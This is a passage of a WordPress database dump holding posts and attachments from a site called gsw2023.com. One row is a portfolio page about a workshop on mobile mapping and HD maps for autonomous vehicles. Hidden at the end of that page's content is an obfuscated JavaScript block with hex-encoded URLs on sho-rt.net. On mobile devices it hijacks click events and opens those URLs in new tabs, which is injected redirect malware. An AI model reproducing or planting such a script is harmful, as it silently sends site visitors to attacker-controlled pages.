(2030,1,'2020-02-03 13:41:30','2020-02-03 13:41:30','','coffee-seven-demo','','inherit','closed','closed','','coffee-seven-demo','','','2020-02-03 13:41:30','2020-02-03 13:41:30','',0,'https://gsw2023.com/wp-content/uploads/2019/06/coffee-seven-demo.jpg',0,'attachment','image/jpeg',0),
(2038,1,'2020-02-10 08:32:41','2020-02-10 08:32:41','','shop-clothing','','inherit','closed','closed','','shop-clothing','','','2020-02-10 08:32:41','2020-02-10 08:32:41','',0,'https://gsw2023.com/wp-content/uploads/2020/02/shop-clothing.jpg',0,'attachment','image/jpeg',0),
(2045,1,'2020-02-14 10:14:28','2020-02-14 10:14:28','','elementor-business-one-page','','inherit','closed','closed','','elementor-business-one-page','','','2020-02-14 10:14:28','2020-02-14 10:14:28','',0,'https://gsw2023.com/wp-content/uploads/2020/02/elementor-business-one-page.jpg',0,'attachment','image/jpeg',0),
(2057,1,'2020-03-06 10:02:40','2020-03-06 10:02:40','','log-demo','','inherit','closed','closed','','log-demo','','','2020-03-06 10:02:40','2020-03-06 10:02:40','',0,'https://gsw2023.com/wp-content/uploads/2020/03/log-demo.jpg',0,'attachment','image/jpeg',0),
(2071,1,'2020-03-09 08:51:11','2020-03-09 08:51:11','','condem','','inherit','closed','closed','','condem','','','2020-03-09 08:51:11','2020-03-09 08:51:11','',0,'https://gsw2023.com/wp-content/uploads/2020/03/condem.jpg',0,'attachment','image/jpeg',0),
(2079,1,'2022-10-04 00:04:29','2022-10-04 00:04:29','','Main The7 Demo','','publish','closed','closed','','main-the7-demo','','','2022-10-04 00:04:29','2022-10-04 00:04:29','',0,'https://gsw2023.com/index.php/2022/10/04/main-the7-demo/',1,'nav_menu_item','',0),
(2080,1,'2022-10-04 00:04:29','2022-10-04 00:04:29','','Support Portal','','publish','closed','closed','','support-portal','','','2022-10-04 00:04:29','2022-10-04 00:04:29','',0,'https://gsw2023.com/index.php/2022/10/04/support-portal/',2,'nav_menu_item','',0),
(2081,1,'2022-10-04 00:04:29','2022-10-04 00:04:29','','Purchase The7','','publish','closed','closed','','purchase-the7','','','2022-10-04 00:04:29','2022-10-04 00:04:29','',0,'https://gsw2023.com/index.php/2022/10/04/purchase-the7/',3,'nav_menu_item','',0),
(2082,1,'2023-09-16 22:41:10','2022-10-04 00:04:29','','Home','','publish','closed','closed','','main-demo','','','2023-09-16 22:41:10','2023-09-16 22:41:10','',0,'https://gsw2023.com/index.php/2022/10/04/main-demo/',1,'nav_menu_item','',0),
(2083,1,'2023-09-16 22:41:11','2022-10-04 00:04:29','','About','','publish','closed','closed','','pre-built-websites','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/index.php/2022/10/04/pre-built-websites/',2,'nav_menu_item','',0),
(2084,1,'2023-09-16 22:41:12','2022-10-04 00:04:29','','Program','','publish','closed','closed','','features','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/index.php/2022/10/04/features/',12,'nav_menu_item','',0),
(2088,1,'2018-06-20 20:18:42','2018-06-20 19:18:42','','po010','','inherit','open','closed','','po010','','','2018-06-20 20:18:42','2018-06-20 19:18:42','',0,'https://gsw2023.com/wp-content/uploads/2016/02/po010.jpg',0,'attachment','image/jpeg',0),
(2090,1,'2020-03-29 12:43:45','2020-03-29 11:43:45','','cr-min-dark','','inherit','closed','closed','','cr-min-dark','','','2020-03-29 12:43:45','2020-03-29 11:43:45','',0,'https://gsw2023.com/wp-content/uploads/2020/03/cr-min-dark.jpg',0,'attachment','image/jpeg',0),
(2093,1,'2020-03-29 12:48:25','2020-03-29 11:48:25','','cr-white','','inherit','closed','closed','','cr-white-2','','','2020-03-29 12:48:25','2020-03-29 11:48:25','',0,'https://gsw2023.com/wp-content/uploads/2020/03/cr-white-1.jpg',0,'attachment','image/jpeg',0),
(2095,1,'2020-04-07 13:03:33','2020-04-07 13:03:33','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\" img_size=\"200x200\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>MMT and HDMaps - Mobile Mapping Technologies and HDMaps</strong></span></h5>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]</p>\r\n<h1><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<strong><u style=\"text-align: left; color: green;\">Scientific Committee:</u></strong></p>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','publish','closed','closed','','mmt-and-hd-maps-mobile-mapping-technologies-and-hd-maps','','','2023-02-05 11:00:13','2023-02-05 11:00:13','',0,'https://the7.io/old-landing/?post_type=dt_portfolio&#038;p=2095',0,'dt_portfolio','',0),
(2097,1,'2020-04-07 13:03:04','2020-04-07 12:03:04','','courses-demo','','inherit','open','closed','','courses-demo','','','2020-04-07 13:03:04','2020-04-07 12:03:04','',2095,'https://gsw2023.com/wp-content/uploads/2020/04/courses-demo.jpg',0,'attachment','image/jpeg',0),
(2098,1,'2018-06-20 20:49:25','2018-06-20 19:49:25','','po013','','inherit','open','closed','','po013','','','2018-06-20 20:49:25','2018-06-20 19:49:25','',0,'https://gsw2023.com/wp-content/uploads/2016/02/po013.jpg',0,'attachment','image/jpeg',0),
(2105,1,'2020-04-22 17:01:49','2020-04-22 16:01:49','','demo-b-adv','','inherit','open','closed','','demo-b-adv','','','2020-04-22 17:01:49','2020-04-22 16:01:49','',0,'https://gsw2023.com/wp-content/uploads/2020/04/demo-b-adv.jpg',0,'attachment','image/jpeg',0),
(2106,1,'2018-06-20 20:57:57','2018-06-20 19:57:57','','po017','','inherit','open','closed','','po017','','','2018-06-20 20:57:57','2018-06-20 19:57:57','',0,'https://gsw2023.com/wp-content/uploads/2016/02/po017.jpg',0,'attachment','image/jpeg',0),
(2108,1,'2018-06-20 20:59:54','2018-06-20 19:59:54','','po018','','inherit','open','closed','','po018','','','2018-06-20 20:59:54','2018-06-20 19:59:54','',0,'https://gsw2023.com/wp-content/uploads/2016/02/po018.jpg',0,'attachment','image/jpeg',0),
(2117,1,'2018-06-20 21:09:46','2018-06-20 20:09:46','','po020','','inherit','open','closed','','po020','','','2018-06-20 21:09:46','2018-06-20 20:09:46','',0,'https://gsw2023.com/wp-content/uploads/2016/01/po020.jpg',0,'attachment','image/jpeg',0),
(2120,1,'2018-06-20 21:12:18','2018-06-20 20:12:18','','po021','','inherit','open','closed','','po021','','','2018-06-20 21:12:18','2018-06-20 20:12:18','',0,'https://gsw2023.com/wp-content/uploads/2016/01/po021.jpg',0,'attachment','image/jpeg',0),
(2143,1,'2020-05-04 11:02:17','2020-05-04 10:02:17','','seven-fashion-blog-demo','','inherit','open','closed','','seven-fashion-blog-demo','','','2020-05-04 11:02:17','2020-05-04 10:02:17','',0,'https://gsw2023.com/wp-content/uploads/2020/05/seven-fashion-blog-demo.jpg',0,'attachment','image/jpeg',0),
(2150,1,'2016-11-14 16:30:30','2016-11-14 16:30:30','[vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" bg_color_value=\"#ffffff\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6 vc_hidden-sm vc_hidden-xs\" css=\".vc_custom_1539519331301{margin-right: -20px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}\"][vc_single_image image=\"1564\" img_size=\"full\" alignment=\"right\" image_hovers=\"false\" lazy_loading=\"true\" el_class=\"layzr-bg-off\"][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-1\" css=\".vc_custom_1480117153134{padding-top: 70px !important;padding-bottom: 70px !important;}\"][vc_single_image image=\"1007\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480355657702{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"WP Bakery Page Builder &amp; Ultimate Addons\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]full and seamless integration[/ultimate_heading][ultimate_heading sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_margin=\"margin-top:30px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\"]The7 features full and seamless integration with WP Bakery Page Builder and Ultimate Addons. Most our customers agree that The7 is the best theme to be used with these plugins, up to date![/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" bg_color_value=\"#f9f9fa\"][vc_column width=\"5/6\" css=\".vc_custom_1480117161323{padding-top: 70px !important;padding-bottom: 70px !important;}\" offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-1\"][vc_single_image image=\"1002\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480355768174{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"1000+ Theme Options\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]to craft any design you can dream of[/ultimate_heading][ultimate_heading sub_heading_font_size=\"desktop:17px;\" sub_heading_line_height=\"desktop:30px;\" sub_heading_margin=\"margin-top:30px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\"]The7\'s 1000+ Theme Options make it the most customizable theme on the market. It gives you the power to customize even tiniest details of your website appearance![/ultimate_heading][/vc_column][vc_column width=\"1/2\" offset=\"vc_hidden-sm vc_hidden-xs\" css=\".vc_custom_1480354986642{margin-right: -100% !important;padding-top: 40px !important;padding-bottom: 30px !important;}\"][vc_single_image image=\"413\" img_size=\"full\" image_hovers=\"false\" lazy_loading=\"true\" el_class=\"layzr-bg-off\"][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" bg_color_value=\"#ffffff\"][vc_column width=\"1/2\" offset=\"vc_hidden-sm vc_hidden-xs\" css=\".vc_custom_1480355177330{margin-right: -50px !important;margin-left: -100% !important;padding-top: 40px !important;padding-bottom: 25px !important;}\"][vc_single_image image=\"1544\" img_size=\"full\" alignment=\"right\" image_hovers=\"false\" lazy_loading=\"true\" el_class=\"layzr-bg-off\"][/vc_column][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-0 vc_col-lg-6 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-1\" css=\".vc_custom_1480117168229{padding-top: 70px !important;padding-bottom: 70px !important;}\"][vc_single_image image=\"1004\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1480355858954{padding-bottom: 25px !important;}\"][ultimate_heading main_heading=\"Design Wizard\" main_heading_font_size=\"desktop:48px;tablet:42px;mobile_landscape:36px;\" main_heading_line_height=\"desktop:58px;tablet:52px;mobile_landscape:46px;\" sub_heading_font_size=\"desktop:28px;tablet:26px;mobile_landscape:24px;\" sub_heading_line_height=\"desktop:38px;tablet:36px;mobile_landscape:34px;\" el_class=\"color-title\" main_heading_margin=\"margin-bottom:10px;\" sub_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" sub_heading_style=\"font-weight:300;\" main_heading_font_family=\"font_family:Roboto|font_call:Roboto|variant:300\" main_heading_style=\"font-weight:300;\"]\n<div id=\"ultimate-heading-33905830888d4de8b\" class=\"uvc-heading 